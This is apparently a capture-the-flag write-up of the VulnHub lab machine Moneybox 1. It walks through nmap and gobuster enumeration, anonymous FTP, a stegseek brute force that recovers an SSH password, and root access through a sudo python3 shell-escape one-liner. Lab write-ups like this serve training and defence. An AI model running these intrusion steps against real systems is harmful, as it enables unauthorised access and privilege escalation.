CTF WRITEUP VULNHUB BLACK BOX LINUX

Moneybox 1 — VulnHub Easy

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

Target IP

192.168.1.12

Moneybox 1 Machine
Machine: Moneybox 1 · Easy · Linux · VulnHub

Moneybox 1 is an Easy-rated VulnHub machine that doesn't waste your time. The intended path is clean — anonymous FTP, a hidden image with credentials tucked inside via steganography, SSH in, and a sudo misconfiguration that hands you root in one command. I finished it in about an hour and a half, though the steghide passphrase took longer than I'd care to admit.

01_Reconnaissance

Standard nmap sweep to start. Three ports — FTP (21), HTTP (80), and SSH (22). Nothing exotic. The FTP version banner comes back as vsftpd 3.0.3, and nmap's default scripts flag it as allowing anonymous login. That's the thread to pull.

terminal / nmap 
$ sudo nmap -sC -sV -p- --min-rate 5000 192.168.1.12

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0  0  146764 May 01 2021 trytofind.jpg
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2

Key Finding

Anonymous FTP lists a file called trytofind.jpg. The name is a hint from the machine author. Nine times out of ten in Easy VulnHub boxes, if there's an image in an anonymous FTP share — check it for steganography.

02_FTP_Enumeration

Anonymous FTP is one of those vulnerabilities that shouldn't exist on anything facing an untrusted network, but here we are. Logged in as anonymous with no password, grabbed the image, and disconnected. Two commands.

terminal / ftp anonymous 
$ ftp 192.168.1.12
Connected to 192.168.1.12.
220 (vsFTPd 3.0.3)
Name (192.168.1.12:kali): anonymous
Password: [blank]

230 Login successful.
ftp> ls
-rw-r--r--    1 0  0  146764 May 01 2021 trytofind.jpg

ftp> get trytofind.jpg
226 Transfer complete.
ftp> bye

03_Web_Enumeration

While stegseek ran in the background I hit the web server. Port 80 shows a basic landing page with the "MoneyBox" branding — nothing in the visible content, but the source was worth a look. Gobuster turned up a /blogs directory pretty quickly.

terminal / gobuster 
$ gobuster dir -u http://192.168.1.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

/index.html           (Status: 200) [Size: 1234]
/blogs                (Status: 301) [Size: 313]
/server-status        (Status: 403) [Size: 277]

Navigating to http://192.168.1.12/blogs and viewing the page source reveals a commented-out hint. The developer left a username sitting in an HTML comment — the kind of thing that gets flagged immediately in a real engagement.

browser / page source 
# view-source:http://192.168.1.12/blogs/index.html

<!-- the hint is -> user: renu -->

OSINT Note

HTML comments in production are a real vulnerability class — I've seen client engagements where staging credentials ended up in commented-out form fields. Always check source on every page, especially anything with a login or registration form nearby.

04_Steganography

Back to the image. Steghide needs a passphrase — stegseek automates the brute force against rockyou.txt. Took maybe two minutes. The extracted file is passcode.txt, which contains the SSH password for user renu.

terminal / stegseek 
$ stegseek trytofind.jpg /usr/share/wordlists/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "[REDACTED]"
[i] Original filename: "passcode.txt"
[i] Extracting to "trytofind.jpg.out"

$ cat trytofind.jpg.out
[REDACTED]

I tried steghide directly before stegseek and kept guessing common passwords manually — password, moneybox, the machine name. Wasted fifteen minutes. Just use stegseek from the start.

05_SSH_Initial_Access

Username from the web comment, password from the image. SSH in and grab the user flag from the home directory.

terminal / ssh 
$ ssh renu@192.168.1.12
renu@192.168.1.12's password: [REDACTED]

renu@MoneyBox:~$ ls
user.txt

renu@MoneyBox:~$ cat user.txt
[REDACTED]

06_PrivEsc_via_Sudo_Python3

First thing I check after landing a shell — sudo -l. The output here is about as generous as it gets: renu can run /usr/bin/python3 as root with no password. GTFObins has the exact one-liner for this.

terminal / privesc 
renu@MoneyBox:~$ sudo -l
Matching Defaults entries for renu on MoneyBox:
    env_reset, mail_badpass, secure_path=...

User renu may run the following commands on MoneyBox:
    (ALL) NOPASSWD: /usr/bin/python3

# GTFObins — sudo python3 shell escape
renu@MoneyBox:~$ sudo python3 -c 'import os; os.system("/bin/sh")'

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt
[REDACTED]

Technique Note — GTFObins

Any scripting language available via sudo NOPASSWD is effectively a root shell. Python3's os.system() spawns a process that inherits the invoking privilege. Same applies to perl, ruby, lua, node — if it can exec, it can escalate. Reference: GTFObins/python.

07_Attack_Chain_Summary

  1. 01 Nmap → ports 21 (FTP anon), 80 (HTTP), 22 (SSH)
  2. 02 Anonymous FTP login → download trytofind.jpg
  3. 03 Gobuster → /blogs directory discovered
  4. 04 /blogs page source → HTML comment reveals username: renu
  5. 05 stegseek trytofind.jpg rockyou.txt → extracts passcode.txt with SSH password
  6. 06 SSH as renu → user.txt
  7. 07 sudo -l → (ALL) NOPASSWD: /usr/bin/python3
  8. 08 sudo python3 GTFObins one-liner → ROOT → root.txt